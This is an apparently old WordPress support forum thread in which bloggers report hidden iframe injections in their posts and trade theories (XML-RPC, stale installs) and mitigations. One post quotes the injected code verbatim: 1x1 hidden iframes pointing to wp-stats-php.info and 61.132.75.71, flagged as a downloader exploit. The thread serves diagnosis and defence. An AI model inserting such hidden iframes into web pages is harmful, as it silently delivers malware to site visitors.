iframe injection problem?

I have found this code from a post dated the 1st Sept. still no word of a fix?

One of my Blogs was injected in that way. I could figure it out in many ways:

– there were many posts posted under administrator account over 3 months
– also there were the mentioned iframe in many posts (IP as mentioned 61….)
– and in existing posts (not admin) there were NOSCRIPT-tags with hidden URLS

I was shocked at all as you can guess. WP version was the lastest before 2.3.1.. I updated now and made a complete new installation. I can not import the posts cause of the hacking things in it. I have to make that by hand.

I don’t think you should close the trac-ticket for this issue!

I searched around how to get my blog more secure. So I made everything possible for me from this paper “How to create a secure wordpress install” from BlogSecurity.net. I subscribed to this blog to keep me up to date what to do against such attacks.

I hope WordPress will do more for security issues. But also I think we have to do more things to get it more secure for ourselves.

No one has yet provided evidence that this is due to a problem in the current release, simply that they have posts which were altered at some point. This leads us to believe that you’re seeing the results of an exploitation in an older, vulnerable, install that you’ve simply not noticed until now.

It’s not that the issue isn’t taken seriously, just that we’ve got nothing but anecdotal accounts to work on, which aren’t enough to reproduce this issue in the current release.

Since I’m running my WordPress blog with strict XHTML served as application/xhtml+xml, and since the injected code isn’t valid XHTML, I wouldn’t’ve missed the breakage when upgrading WordPress if it was there, and I only have one configured WordPress instance on my server. I keep my WordPress install up-to-date with stable releases via svn.

Unfortunately I don’t really have enough other than this to create a new ticket, but I’m fairly sure that this is the only WordPress install I have, and that the post was modified after upgrading to 2.3.1.

pishmishy,

Has nothing to do with old exploits, though the problem may have been around a while judging by some of the reports. I’ve had the problem turn up again in one of my blogs running 2.3.1. The problem has happened fairly recently, though I can’t pinpoint exactly when. Since I first noticed an injection I have checked my database from time to time to see if there have been any new injections. Nothing until now, some time after upgrading to 2.3.1.

When I upgraded from 2.3 to 2.3.1 I took pains to make sure old files were not still lingering where they might cause problems. So the injection took place from the 2.3.1 code. I realize this information is not altogether helpful, but it’s all I can offer.

I upgraded from 2.3.1 to 2.3.2 and I noticed my website was hanging found that one of my post had the iframe connection to 61.132.75.71

I’m not sure if this happened before or after the upgrade.

Also, I installed a new theme, and I was going to make some changes to the code, and noticed some strange code in it. Thats when I started looking around to see any sneaky code was in the theme. I was right, that certain line of code was in the sidebar, header, footer and so on. After getting the sneaky code out of my theme. I noticed my website kept hanging, I thought I still had some bad code, when I did a search on the ip it was trying to connect to, I found th is thread about the iframe. Sure enough it was in a post about spyware I wrote some time ago.

Same effect here. I upgraded everything to 2.3.2 and then noticed issues. The posts modified are older posts (nothing completely current, but stuff that was on the front page of the site) and in at least one case, I was able to confirm with google cache that the injection had occured before the 2.3.2 upgrade.

The injection is 100% certainly via XMLRPC, because the posts are getting their character set maimed as well on the repost (they are using UTF-8, but I have some blogs set not to use it).

I found this issue on a number of blogs over a number of databased with different usernames, passwords, db passwords, themes, layouts, and such. In some cases there were no additional users besides admin on the blog.

I upgraded all of my blogs within hours of the 2.3.2 release (a ton of work, thanks) and I will be watching closely for any additional activity.

It should be noted that Google does not like these frames, and it appears that they will pretty much remove your site from the SERPs if they find them on your pages.

For what it’s worth, this happened to me as well.

Sometime between 10-31-2007 and today. AVG alerted one of my users today who reported

“AVG antivirus pops up two warnings: one for JS/Downloader Agent, and one for ‘Exploit.'”

Also iframes, hosts (www.)wp-stats-php.info and 61.132.75.71, both serving up wp-stats.php. As soon as I did a whois on the domains and saw they were China, I knew something was afoot.

I was either running wp version 2.2 OR 2.3.1, I simply can’t narrow everything down. Even if I knew when I upgraded to 2.3.1, I still don’t know when the attacker performed the SQL injection, or whatever it was.

I used phpadmin to search the database for “wp-stats” and that located the troublesome posts.

Is there any definitive answer yet as to how/why/only 2.2 was vulnerable, etc?

Thanks

I got it in 2.3.1 for sure.

We need to know more about how they’re getting in. An exploit in WordPress is not the only way this sort of thing can happen.

For example, if they ever gained read access to your wp-config.php file (and you didn’t notice and change the password), then they have your database info and can simply insert the content directly, no need to go through your website at all.

Somebody needs to look through their server logs and find out just what’s happening when the content gets inserted. Email that information to [email protected] as well as posting it here.

Hi! I found the same problem on my blog https://www.visoko.si/wp I’m running 2.2 WordPress with customized theme and on Hostgator account with Fantastico.
Found two injections:

<!– Traffic Statistics –><iframe FRAMEBORDER=”0″ FRAMEBORDER=”0″ HEIGHT=”1″ WIDTH=”1″ SRC=”https://www.wp-stats-php.info/iframe/wp-stats.php”></iframe&gt; <!– End Traffic Statistics –>

and

<!– Traffic Statistics –>
<iframe src=https://61.132.75.71/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe>
<!– End Traffic Statistics –>

I’m checking with my shared hosting provider if I can get access to the mysql logs.

In the interim, is there a way of determining when your particular wordpress installation was upgraded? Maybe looking at file dates? Or do database entries contain a version stamp of the WP that wrote it, etc?

Thanks

Otto42, I have seen how this is done,and it is pretty simple actually. The content appears to be changed during an edit started via xml-rpc. They are pulling the post, adding the code, and re-uploading the post back into place with the new code, all while NOT actually triggering an edit or update.

There is no indication of direct connection to the database, which would be impossible anyway because my DBs are locked down and restricted to localhost access only. Thus the only way the can make the change is by executing code on the server.

I have seen this on multiple blogs, each of which has different user and password combinations.

This is a major issue. When google sees this on your pages, your blog goes immediately into their VERY bad last for linking to a bad neighborhood, for installing trojans, and as such, you lose pretty much all your traffic in very short order.

While my host was of very little help, I’ve taken a couple steps to help mitigate future problems.

I’m now backing up the db much more frequently, so I can compare and get an exact date when something was changed.

I started blocking China (amongst other countries) from my website wholesale via .htaccess.

I made a minor change to wp-db.php that records each and every query to a separate file with date/time and IP address stamps. My blog is not that busy/popular, and although its generating relatively large logs, space is available and cheap. Mind you, this is just sort of outbound queries to the database NOT the results from the queries. I tested both posts and edit posts, and if WP is being used in the commission of the crime, then I’ll have an entry with some information. I’ve been grep’ing the logs for “iframe” and “wp-stats” which I think is a very good indication something funny is going on.

thanks

Keith, bad news for you: the guys doing this sort of thing use proxies and servers located in the US to cause the infection – the destination of the traffic is china (and then actually Russia… but that a longer story). So you can end up with these things all over your blog even if you have all of the eastern block and communist world blocked.

If you are going to log queries, I would suggest only logging update and insert queries, to keep your log a little shorter. Otherwise you will end up with a huge log and it will be difficult to spot anything.